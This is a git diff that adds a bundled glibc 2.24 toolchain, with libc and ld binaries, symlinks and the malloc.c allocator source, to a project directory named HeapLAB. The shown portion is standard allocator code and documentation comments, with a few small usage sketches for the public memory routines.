+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   heap->size, heap->mprotect_size);
+	  total_aspace += heap->size;
+	  total_aspace_mprotect += heap->mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __cfree) weak_alias (__libc_free, cfree)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+weak_alias (__malloc_get_state, malloc_get_state)
+weak_alias (__malloc_set_state, malloc_set_state)
+
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.24/ld-2.24.so b/HeapLAB/.glibc/glibc_2.24/ld-2.24.so
new file mode 100755
index 0000000..6abd837
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.24/ld-2.24.so differ
diff --git a/HeapLAB/.glibc/glibc_2.24/ld.so.2 b/HeapLAB/.glibc/glibc_2.24/ld.so.2
new file mode 120000
index 0000000..6b1a56f
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.24/ld.so.2
@@ -0,0 +1 @@
+ld-2.24.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.24/libc-2.24.so b/HeapLAB/.glibc/glibc_2.24/libc-2.24.so
new file mode 100755
index 0000000..2fece10
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.24/libc-2.24.so differ
diff --git a/HeapLAB/.glibc/glibc_2.24/libc.so.6 b/HeapLAB/.glibc/glibc_2.24/libc.so.6
new file mode 120000
index 0000000..77d3c6d
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.24/libc.so.6
@@ -0,0 +1 @@
+libc-2.24.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.24/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.24/malloc/malloc.c
new file mode 100644
index 0000000..1f5f166
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.24/malloc/malloc.c
@@ -0,0 +1,5288 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2016 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    cfree(void* p);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+    MALLOC_ALIGNMENT           MAX (2 * sizeof(INTERNAL_SIZE_T),
+				    __alignof__ (long double))
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <malloc-machine.h>
+#include <malloc-sysdep.h>
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-internal.h>
+
+#include <malloc/malloc-internal.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifdef NDEBUG
+# define assert(expr) ((void) 0)
+#else
+# define assert(expr) \
+  ((expr)								      \
+   ? ((void) 0)								      \
+   : __malloc_assert (#expr, __FILE__, __LINE__, __func__))
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+
+/*
+  INTERNAL_SIZE_T is the word-size used for internal bookkeeping
+  of chunk sizes.
+
+  The default version is the same as size_t.
+
+  While not strictly necessary, it is best to define this as an
+  unsigned type, even if size_t is a signed type. This may avoid some
+  artificial size limitations on some systems.
+
+  On a 64-bit machine, you may be able to reduce malloc overhead by
+  defining INTERNAL_SIZE_T to be a 32 bit `unsigned int' at the
+  expense of not being able to handle more than 2^32 of malloced
+  space. If this limitation is acceptable, you are encouraged to set
+  this unless you are on a platform requiring 16byte alignments. In
+  this case the alignment requirements turn out to negate any
+  potential advantages of decreasing size_t word size.
+
+  Implementors: Beware of the possible combinations of:
+     - INTERNAL_SIZE_T might be signed or unsigned, might be 32 or 64 bits,
+       and might be the same width as int or as long
+     - size_t might have different width and signedness as INTERNAL_SIZE_T
+     - int and long might be 32 or 64 bits, and might be the same width
+  To deal with this, most comparisons and difference computations
+  among INTERNAL_SIZE_Ts should cast them to unsigned long, being
+  aware of the fact that casting an unsigned int to a wider long does
+  not sign-extend. (This also makes checking for negative numbers
+  awkward.) Some of these casts result in harmless compiler warnings
+  on some systems.
+*/
+
+#ifndef INTERNAL_SIZE_T
+#define INTERNAL_SIZE_T size_t
+#endif
+
+/* The corresponding word size */
+#define SIZE_SZ                (sizeof(INTERNAL_SIZE_T))
+
+
+/*
+  MALLOC_ALIGNMENT is the minimum alignment for malloc'ed chunks.
+  It must be a power of two at least 2 * SIZE_SZ, even on machines
+  for which smaller alignments would suffice. It may be defined as
+  larger than this though. Note however that code and data structures
+  are optimized for the case of 8-byte alignment.
+*/
+
+
+#ifndef MALLOC_ALIGNMENT
+# define MALLOC_ALIGNMENT       (2 * SIZE_SZ < __alignof__ (long double) \
+				 ? __alignof__ (long double) : 2 * SIZE_SZ)
+#endif
+
+/* The corresponding bit mask value */
+#define MALLOC_ALIGN_MASK      (MALLOC_ALIGNMENT - 1)
+
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
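+
+/*
+  For example, a typical caller checks for the null return before using
+  the memory; on failure errno has been set to ENOMEM.  A minimal sketch
+  (the 64-byte request size is arbitrary):
+
+    char *buf = malloc (64);
+    if (buf != NULL)
+      {
+        buf[0] = 'A';
+        free (buf);
+      }
+*/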
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
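+
+/*
+  For example, clearing the pointer right after the call makes an
+  accidental second free harmless, because free(NULL) has no effect.
+  A minimal sketch:
+
+    free (p);
+    p = NULL;
+*/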
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
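+
+/*
+  For example, to obtain a zero-initialized array of 16 ints (a minimal
+  sketch; the element count is arbitrary):
+
+    int *counts = calloc (16, sizeof (int));
+    if (counts != NULL)
+      {
+        counts[0]++;
+        free (counts);
+      }
+*/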
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always
+  be reallocated using malloc-copy-free sequences unless
+  the system supports MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
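+
+/*
+  Because a failed realloc returns null and leaves p allocated, callers
+  that need to keep the old block on failure should assign the result to
+  a temporary first.  A minimal sketch (the sizes are arbitrary):
+
+    char *p = malloc (32);
+    if (p != NULL)
+      {
+        char *q = realloc (p, 128);
+        if (q != NULL)
+          p = q;
+        free (p);
+      }
+*/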
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
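+
+/*
+  For example, a program that wants to disable fastbins entirely can call
+  mallopt before its first allocation; the return value is 1 on success
+  and 0 otherwise.  A minimal sketch:
+
+    #include <malloc.h>
+
+    int ok = mallopt (M_MXFAST, 0);
+*/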
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
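+
+/*
+  For example, the current allocated and free totals can be reported like
+  this (a minimal sketch; the fields are plain ints):
+
+    #include <malloc.h>
+    #include <stdio.h>
+
+    struct mallinfo mi = mallinfo ();
+    printf ("in use: %d bytes, free: %d bytes\n", mi.uordblks, mi.fordblks);
+*/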
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
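+
+/*
+  A caller-side sketch (big_buffer is a placeholder; the 1 MiB pad is
+  illustrative):
+
+    free (big_buffer);              // drop a large working set
+    if (malloc_trim (1024 * 1024))  // keep ~1 MiB of trailing slack
+      ;                             // some memory went back to the system
+*/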
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
